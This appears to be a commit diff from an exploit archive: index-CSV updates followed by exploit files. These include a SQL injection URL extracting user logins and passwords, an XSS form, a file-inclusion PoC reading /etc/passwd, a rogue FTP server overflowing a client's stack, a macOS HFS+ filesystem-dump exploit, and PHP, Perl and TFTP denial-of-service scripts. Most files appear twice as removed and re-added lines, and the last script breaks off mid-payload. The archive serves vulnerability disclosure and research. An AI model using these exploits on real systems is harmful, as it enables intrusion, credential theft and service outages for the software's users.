30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10 b Multiple Denial of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0
30024,platforms/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow Vulnerability",2007-05-11,"Victor Stinner",linux,dos,0
30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0
30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 Unspecified Directory Traversal Vulnerability",2007-05-11,"Digital Defense",windows,remote,0
30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Unspecified Directory Traversal Vulnerability",2007-05-11,"Digital Defense",windows,remote,0
30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 Web Mail HTML Injection Vulnerability",2007-05-12,"Alla Bezroutchko",php,webapps,0
30028,platforms/php/webapps/30028.txt,"EQDKP <= 1.3.1 Show Variable Cross-Site Scripting Vulnerability",2007-05-12,kefka,php,webapps,0
30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 Search.PHP Cross-Site Scripting Vulnerability",2007-05-14,"Jesper Jurcenoks",php,webapps,0
@ -27292,7 +27292,7 @@ id,file,description,date,author,platform,type,port
30451,platforms/asp/webapps/30451.txt,"Next Gen Portfolio Manager Default.ASP Multiple SQL Injection Vulnerabilities",2007-08-03,"Aria-Security Team",asp,webapps,0
30452,platforms/php/webapps/30452.txt,"J! Reactions 1.8.1 comPath Remote File Include Vulnerability",2007-08-04,Yollubunlar.Org,php,webapps,0
30453,platforms/php/webapps/30453.txt,"snif 1.5.2 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps,0
30454,platforms/linux/remote/30454.txt,"BlueCat Networks Adonis 5.0.2 .8 TFTP Remote Privilege Escalation Vulnerability",2007-08-06,defaultroute,linux,remote,0
30454,platforms/linux/remote/30454.txt,"BlueCat Networks Adonis 5.0.2 .8 - TFTP Remote Privilege Escalation Vulnerability",2007-08-06,defaultroute,linux,remote,0
30455,platforms/windows/dos/30455.txt,"Microsoft Internet Explorer 6.0 Position:Relative Denial of Service Vulnerability",2007-08-07,Hamachiya2,windows,dos,0
30456,platforms/php/webapps/30456.txt,"VietPHP _functions.php dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0
30457,platforms/php/webapps/30457.txt,"VietPHP admin/index.php language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0
@ -31818,7 +31818,7 @@ id,file,description,date,author,platform,type,port
35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0
35324,platforms/php/webapps/35324.txt,"Wordpress CM Download Manager Plugin 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0
35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
35326,platforms/windows/local/35326.cpp,"Microsoft Windows Win32k.sys - Denial of Service",2014-11-22,Kedamsky,windows,local,0
35326,platforms/windows/dos/35326.cpp,"Microsoft Windows Win32k.sys - Denial of Service",2014-11-22,Kedamsky,windows,dos,0
35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0
35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 'nav.html' Cross Site Scripting Vulnerability",2011-02-09,MustLive,php,webapps,0
@ -31910,6 +31910,7 @@ id,file,description,date,author,platform,type,port
35421,platforms/hardware/webapps/35421.txt,"IPUX CL5452/CL5132 IP Camera - (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
35426,platforms/windows/remote/35426.pl,"Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit",2014-12-02,"ZoRLu Bugrahan",windows,remote,0
35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
@ -31957,3 +31958,10 @@ id,file,description,date,author,platform,type,port
35480,platforms/php/webapps/35480.txt,"Online store php script Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-21,"kurdish hackers team",php,webapps,0
35481,platforms/php/webapps/35481.txt,"NewsPortal 0.37 'post.php' Cross Site Scripting Vulnerability",2011-03-21,"kurdish hackers team",php,webapps,0
35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 'year' Parameter Cross Site Scripting Vulnerability",2011-03-21,"kurdish hackers team",php,webapps,0
35483,platforms/php/dos/35483.txt,"PHP 5.3.x 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service Vulnerability",2011-03-10,thoger,php,dos,0
35484,platforms/php/dos/35484.php,"PHP 5.3.x 'Zip' Extension 'stream_get_contents()' Function Denial of Service Vulnerability",2011-03-10,paulgao,php,dos,0
35485,platforms/php/dos/35485.php,"PHP 5.x 'Zip' Extension 'zip_fread()' Function Denial of Service Vulnerability",2011-03-10,TorokAlpar,php,dos,0
35486,platforms/php/dos/35486.php,"PHP 5.x OpenSSL Extension openssl_encrypt Function Plaintext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
35487,platforms/php/dos/35487.php,"PHP 5.x OpenSSL Extension x Function openssl_decrypt Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure Vulnerability",2011-03-21,"Dan Rosenberg",osx,local,0
35489,platforms/multiple/dos/35489.pl,"Perl 5.x 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0

Can't render this file because it is too large.

94
platforms/asp/webapps/3197.txt
View file

@ -1,47 +1,47 @@
*******************************************************************************
# Title : Forum Livre 1.0 Multiple Remote Vulnerabilities
# Author : ajann
# Contact : :(
# $$ : Free
*******************************************************************************
[[SQL]]]---------------------------------------------------------
Login Before..->
http://[target]/[path]//info_user.asp?user=[SQL]
Example:
//info_user.asp?user=-1'union%20select%200,0,0,loginu,senhau,0,0,0,0,0,0%20from%20tusuario
[[/SQL]]
[[XSS]]]---------------------------------------------------------
Login Before..->
http://[target]/[path]//busca2.asp (POST Method) [SQL]
Example:
<form method="POST" action="http://[TARGET]/[path]/busca2.asp">
<input type="text" name="palavra" value="[#]XSS HERE[#]">
<input type="radio" value="all" name="tipo" checked>
<input type="radio" value="some" name="tipo">
<select size="1" name="forum">
<option value="">Todos os fóruns</option>
<option value="">Fórum ComCatz</option>
<input type="submit" value="Investigar" name="B1">
</form>
[[/XSS]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-25]
*******************************************************************************
# Title : Forum Livre 1.0 Multiple Remote Vulnerabilities
# Author : ajann
# Contact : :(
# $$ : Free
*******************************************************************************
[[SQL]]]---------------------------------------------------------
Login Before..->
http://[target]/[path]//info_user.asp?user=[SQL]
Example:
//info_user.asp?user=-1'union%20select%200,0,0,loginu,senhau,0,0,0,0,0,0%20from%20tusuario
[[/SQL]]
[[XSS]]]---------------------------------------------------------
Login Before..->
http://[target]/[path]//busca2.asp (POST Method) [SQL]
Example:
<form method="POST" action="http://[TARGET]/[path]/busca2.asp">
<input type="text" name="palavra" value="[#]XSS HERE[#]">
<input type="radio" value="all" name="tipo" checked>
<input type="radio" value="some" name="tipo">
<select size="1" name="forum">
<option value="">Todos os fóruns</option>
<option value="">Fórum ComCatz</option>
<input type="submit" value="Investigar" name="B1">
</form>
[[/XSS]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-25]

6
platforms/hardware/remote/1081.c
View file

@ -183,6 +183,6 @@ uid=0(root) gid=0(root) groups=0(root)
hostname;
threat
: command not found
*/
// milw0rm.com [2005-07-03]
*/
// milw0rm.com [2005-07-03]

174
platforms/linux/dos/9264.py
View file

@ -1,87 +1,87 @@
#!/usr/bin/python
# stftp <= 1.10 (PWD Response Stack Overflow) PoC
# Tested on: OpenSuSE 11.1 x64
# Coding: sqlevil - sqlevil@hotmail.com
# Viva Muslam Al-Barrak
from socket import *
class tcp:
def __init__(self):
self.s = socket(AF_INET, SOCK_STREAM)
self.s.bind(("0.0.0.0",21))
def getnext(self):
print ("Listening for connection ...\n")
self.s.listen(1)
c, addr = self.s.accept()
print ("client is nOw cOnnected\n")
return c
def close(self):
self.s.close();
class ftp:
def exCommand(self, command):
if (len(command)<80):
print("S -> C: " + command)
else:
print("S -> C: " + command[0:80] + " ...")
self.s.send(command+'\r\n')
def getCommand(self, size=1024):
ret = self.s.recv(size);
if (len(ret)<80):
print ("C -> S: " +ret)
else:
print ("C -> S: " +ret[0:80] + " ...")
return ret
def __init__(self, c):
self.s=c
def Banner(self, str="Hi There"):
self.exCommand( "220 %s" % str)
def Auth(self, str1="pwd please", str2="OK"):
self.getCommand()
self.exCommand( "331 %s" % str1)
self.getCommand()
self.exCommand( "230 %s" % str2)
def PWD(self, path='/', str='"%s" is current directory.'):
self.getCommand()
self.exCommand( '257 %s' % str % path)
def Reject(self):
self.getCommand()
self.exCommand( "230 ERR Type set to I.")
def SYST(self):
self.getCommand()
self.exCommand( "215 UNIX Type: L8")
def PORT(self):
self.getCommand()
self.exCommand( "200 PORT command successful.")
def CWD(self):
self.getCommand()
self.exCommand( "250 CWD command successful.")
def PASIV(self):
self.getCommand()
self.exCommand( "227 Entering Passive Mode (174,142,51,122,17,214).")
def stftp(self):
# TODO: Enter yOur desire address here
retadd='abcdefghi'
self.Banner()
self.Auth()
# This custom string is adjusted for x64 architeture
self.PWD('x'*144+retadd)
self.getCommand()
t = tcp()
try:
f=ftp(t.getnext())
f.stftp()
except: pass
finally:
t.close()
print "by3 <<<"
# milw0rm.com [2009-07-27]
#!/usr/bin/python
# stftp <= 1.10 (PWD Response Stack Overflow) PoC
# Tested on: OpenSuSE 11.1 x64
# Coding: sqlevil - sqlevil@hotmail.com
# Viva Muslam Al-Barrak
from socket import *
class tcp:
def __init__(self):
self.s = socket(AF_INET, SOCK_STREAM)
self.s.bind(("0.0.0.0",21))
def getnext(self):
print ("Listening for connection ...\n")
self.s.listen(1)
c, addr = self.s.accept()
print ("client is nOw cOnnected\n")
return c
def close(self):
self.s.close();
class ftp:
def exCommand(self, command):
if (len(command)<80):
print("S -> C: " + command)
else:
print("S -> C: " + command[0:80] + " ...")
self.s.send(command+'\r\n')
def getCommand(self, size=1024):
ret = self.s.recv(size);
if (len(ret)<80):
print ("C -> S: " +ret)
else:
print ("C -> S: " +ret[0:80] + " ...")
return ret
def __init__(self, c):
self.s=c
def Banner(self, str="Hi There"):
self.exCommand( "220 %s" % str)
def Auth(self, str1="pwd please", str2="OK"):
self.getCommand()
self.exCommand( "331 %s" % str1)
self.getCommand()
self.exCommand( "230 %s" % str2)
def PWD(self, path='/', str='"%s" is current directory.'):
self.getCommand()
self.exCommand( '257 %s' % str % path)
def Reject(self):
self.getCommand()
self.exCommand( "230 ERR Type set to I.")
def SYST(self):
self.getCommand()
self.exCommand( "215 UNIX Type: L8")
def PORT(self):
self.getCommand()
self.exCommand( "200 PORT command successful.")
def CWD(self):
self.getCommand()
self.exCommand( "250 CWD command successful.")
def PASIV(self):
self.getCommand()
self.exCommand( "227 Entering Passive Mode (174,142,51,122,17,214).")
def stftp(self):
# TODO: Enter yOur desire address here
retadd='abcdefghi'
self.Banner()
self.Auth()
# This custom string is adjusted for x64 architeture
self.PWD('x'*144+retadd)
self.getCommand()
t = tcp()
try:
f=ftp(t.getnext())
f.stftp()
except: pass
finally:
t.close()
print "by3 <<<"
# milw0rm.com [2009-07-27]

15
platforms/multiple/dos/35489.pl Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/47006/info
Perl is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause an application implemented with affected perl code to abort, denying service to legitimate users.
#!/usr/bin/perl
my @x = ("A=B","AAAA=/");
utf8::upgrade $_ for @x;
$x[1] =~ s{/\s*$}{};
for (@x) {
m{^([^=]+?)\s*=.+$};
}

95
platforms/osx/local/35488.c Executable file
View file

@ -0,0 +1,95 @@
source: http://www.securityfocus.com/bid/46982/info
Apple Mac OS X is prone to a local information-disclosure vulnerability because of an integer-overflow error in the HFS subsystem.
A local attacker can exploit this issue to obtain sensitive information that may lead to further attacks. Due to the nature of this issue, local attackers may be able to execute arbitrary code in the context of the kernel, but this has not been confirmed.
Versions prior to OS X 10.6.7 are vulnerable.
NOTE: This issue was previously discussed in BID 46950 (Apple Mac OS X Prior to 10.6.7 Multiple Security Vulnerabilities) but has been given its own record to better document it.
/*
* Apple HFS+ F_READBOOTSTRAP Information Disclosure
* by Dan Rosenberg of Virtual Security Research, LLC
* @djrbliss on twitter
*
* Usage:
* $ gcc hfs-dump.c -o hfs-dump
* $ ./hfs-dump [size] [outfile]
*
* ----
*
* F_READBOOTSTRAP is an HFS+ fcntl designed to allow unprivileged callers to
* retrieve the first 1024 bytes of the filesystem, which contains information
* related to bootstrapping.
*
* However, due to an integer overflow in checking the requested range of
* bytes, it is possible to retrieve arbitrary filesystem blocks, leading to an
* information disclosure vulnerability.
*
* This issue was originally reported to Apple on July 1, 2010. The fix was a
* single line long and took more than 8 months to release. No gold stars were
* awarded.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
int main(int argc, char * argv[])
{
int fd, outfd, ret;
long num;
unsigned char * buf;
struct fbootstraptransfer arg;
if(argc != 3) {
printf("[*] Usage: %s [size] [outfile]\n", argv[0]);
return -1;
}
num = atol(argv[1]);
outfd = open(argv[2], O_RDWR | O_CREAT, 0644);
if(outfd < 0) {
printf("[*] Failed to open output file.\n");
return -1;
}
ftruncate(outfd, num);
buf = (unsigned char *)mmap(NULL, num, PROT_READ | PROT_WRITE,
MAP_SHARED, outfd, 0);
if(buf == MAP_FAILED) {
printf("[*] Not enough memory.\n");
return -1;
}
arg.fbt_buffer = buf;
arg.fbt_offset = num * (-1);
arg.fbt_length = num;
fd = open("/", O_RDONLY);
if(fd < 0) {
printf("[*] Failed to open filesystem root.\n");
return -1;
}
ret = fcntl(fd, F_READBOOTSTRAP, &arg);
if(ret < 0) {
printf("[*] fcntl failed.\n");
return -1;
}
printf("[*] Successfully dumped %lu bytes to %s.\n", num, argv[2]);
return 0;
}

9
platforms/php/dos/35483.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46968/info
PHP is prone to a remote denial-of-service vulnerability that affects the 'Intl' extension.
Successful attacks will cause the application to crash, creating a denial-of-service condition. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed.
PHP versions prior to 5.3.6 are vulnerable.
numfmt_set_symbol(numfmt_create("en", NumberFormatter::PATTERN_DECIMAL), 2147483648, "")

35
platforms/php/dos/35484.php Executable file
View file

@ -0,0 +1,35 @@
source: http://www.securityfocus.com/bid/46969/info
PHP is prone to a remote denial-of-service vulnerability that affects the 'Zip' extension.
Successful attacks will cause the application to crash, creating a denial-of-service condition. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed.
Versions prior to PHP 5.3.6 are vulnerable.
<?php
$target_file = 'META-INF/MANIFEST.MF';
$za = new ZipArchive();
if ($za->open('test.jar') !== TRUE)
{
return FALSE;
}
if ($za->statName($target_file) !== FALSE)
{
$fd = $za->getStream($target_file);
}
else
{
$fd = FALSE;
}
$za->close();
if (is_resource($fd))
{
echo strlen(stream_get_contents($fd));
}
?>

21
platforms/php/dos/35485.php Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/46975/info
PHP is prone to a remote denial-of-service vulnerability that affects the 'Zip' extension.
Successful attacks will cause the application to crash, creating a denial-of-service condition. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed.
Versions prior to PHP 5.3.6 are vulnerable.
<?php
$o = new ZipArchive();
if (! $o->open('test.zip',ZipArchive::CHECKCONS)) {
exit ('error can\'t open');
}
$o->getStream('file2'); // this file is ok
echo "OK";
$r = $o->getStream('file1'); // this file has a wrong crc
while (! feof($r)) {
fread($r,1024);
}
echo "never here\n";
?>

22
platforms/php/dos/35486.php Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/46977/info
PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension.
Successful attacks will cause the application to consume excessive memory, creating a denial-of-service condition.
Versions prior to PHP 5.3.6 are vulnerable.
<?php
$data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls";
$pass = "r23498rui324hjbnkj";
$maxi = 200000;
$t = microtime(1);
for ($i=0;$i<$maxi; $i++){
openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2');
}
$t = microtime(1)-$t;
print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n";
?>

31
platforms/php/dos/35487.php Executable file
View file

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/46977/info
PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension.
Successful attacks will cause the application to consume excessive memory, creating a denial-of-service condition.
Versions prior to PHP 5.3.6 are vulnerable.
<?php
$data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls";
$pass = "r23498rui324hjbnkj";
$maxi = 200000;
$t = microtime(1);
for ($i=0;$i<$maxi; $i++){
$cr = openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2');
$dcr = openssl_decrypt($cr, 'des3', $pass, false, '1qazxsw2');
if ($dcr != $data.$i){
print "at step $i decryption failed\n";
}
}
$t = microtime(1)-$t;
print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n";
?>
fixes by add this code at line 4818 at the end of openssl_decrypt:
EVP_CIPHER_CTX_cleanup(&cipher_ctx);
?>

86
platforms/php/webapps/8504.txt
View file

@ -1,43 +1,43 @@
NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/
Author: Kacper
Email: kacper1964@yahoo.pl
Home: http://devilteam.pl/
DC++ Hub address: bluber-hub.no-ip.biz:2008
Vuln:
File config.php:
#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################
if (isset($newlang))
{
require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}
# NotFTP version. Changing this would be silly. So don't.
PoC:
http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd
The End
=========
# milw0rm.com [2009-04-21]
NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/
Author: Kacper
Email: kacper1964@yahoo.pl
Home: http://devilteam.pl/
DC++ Hub address: bluber-hub.no-ip.biz:2008
Vuln:
File config.php:
#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################
if (isset($newlang))
{
require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}
# NotFTP version. Changing this would be silly. So don't.
PoC:
http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd
The End
=========
# milw0rm.com [2009-04-21]

24
platforms/windows/dos/1424.pl
View file

@ -1,12 +1,12 @@
#!/usr/bin/perl
# Tftpd32 Format String PoC DoS by Critical Security research http://www.critical.lt
use IO::Socket;
$port = "69";
$host = "127.0.0.1";
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
$bzz = "\x00\x01" ; #GET
$bzz .= "%.1000x\x00";
$bzz .= "\x6F\x63\x74\x65\x74\x00"; #octet
$tftpudp->send($bzz);
# milw0rm.com [2006-01-19]
#!/usr/bin/perl
# Tftpd32 Format String PoC DoS by Critical Security research http://www.critical.lt
use IO::Socket;
$port = "69";
$host = "127.0.0.1";
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
$bzz = "\x00\x01" ; #GET
$bzz .= "%.1000x\x00";
$bzz .= "\x6F\x63\x74\x65\x74\x00"; #octet
$tftpudp->send($bzz);
# milw0rm.com [2006-01-19]

4
platforms/windows/dos/18140.txt → platforms/windows/dos/18140.c
View file

@ -1,4 +1,4 @@
Crash:
//Crash:
/*
win7
Access violation - code c0000005 (!!! second chance !!!)
@ -73,7 +73,7 @@ winxp
.text:BF8821F5 mov eax, [ecx+3Ch]
.text:BF8821F8 add eax, ecx
.text:BF8821FA movzx edx, word ptr [eax+6] -----crash
*/
// poc.cpp : 定义控制台应用程序的入口点。

168
platforms/windows/dos/2334.py
View file

@ -1,84 +1,84 @@
#!/usr/bin/python
#Multithreaded TFTP 1.1 Server d0s exploit by n00b
#the following is affected causing a denial of service
#Due to an overly long GET request to the ftp server
###########################################################################
#Tested on winx xp sp1,sp2 eng.
#Vendor dont know but s00n will :p
#n00b is credited for finding this dos exploit.
#Vendor web site:http://sourceforge.net/projects/tftp-server/
#Im sry if it look's a little messy as python isn't
#my strong point.Also i would like to thank milw0rm for
#all there help over the year's and to ignted's.com
#And also big shout to <Aelphaeis Mangarae> And any-one else i forgot ^ ^.
############################################################################
# \\DEBUG INF0//
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=77c5a76e ebx=77c5a7a0 ecx=77c318f2 edx=77c5cac8 esi=00407253 edi=41414141
#eip=77c44257 esp=00f9ff20 ebp=00f9ff2c iopl=0 nv up ei pl nz na
po nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
#*** ERROR: Symbol file could not be found. Defaulted to export symbols.
#msvcrt!wcsxfrm+0x11d:
#77c44257 8a27 mov ah,[edi] ds:0023:41414141=??
############################################################################
import socket
# Set up a UDP socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# send
n00bstring ='''\x00\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
'''
HOSTNAME = '127.0.0.1'
PORTNO = 69
s.connect((HOSTNAME, PORTNO))
if len(n00bstring) != s.send(n00bstring):
# where to get error message "$!".
print "cannot send to %s(%d):" % (HOSTNAME,PORTNO)
raise SystemExit(1)
MAXLEN = 1024
(data,addr) = s.recvfrom(MAXLEN)
s.close()
print '%s(%d) said "%s"' % (addr[0],addr[1], data)
# milw0rm.com [2006-09-08]
#!/usr/bin/python
#Multithreaded TFTP 1.1 Server d0s exploit by n00b
#the following is affected causing a denial of service
#Due to an overly long GET request to the ftp server
###########################################################################
#Tested on winx xp sp1,sp2 eng.
#Vendor dont know but s00n will :p
#n00b is credited for finding this dos exploit.
#Vendor web site:http://sourceforge.net/projects/tftp-server/
#Im sry if it look's a little messy as python isn't
#my strong point.Also i would like to thank milw0rm for
#all there help over the year's and to ignted's.com
#And also big shout to <Aelphaeis Mangarae> And any-one else i forgot ^ ^.
############################################################################
# \\DEBUG INF0//
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=77c5a76e ebx=77c5a7a0 ecx=77c318f2 edx=77c5cac8 esi=00407253 edi=41414141
#eip=77c44257 esp=00f9ff20 ebp=00f9ff2c iopl=0 nv up ei pl nz na
po nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
#*** ERROR: Symbol file could not be found. Defaulted to export symbols.
#msvcrt!wcsxfrm+0x11d:
#77c44257 8a27 mov ah,[edi] ds:0023:41414141=??
############################################################################
import socket
# Set up a UDP socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# send
n00bstring ='''\x00\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
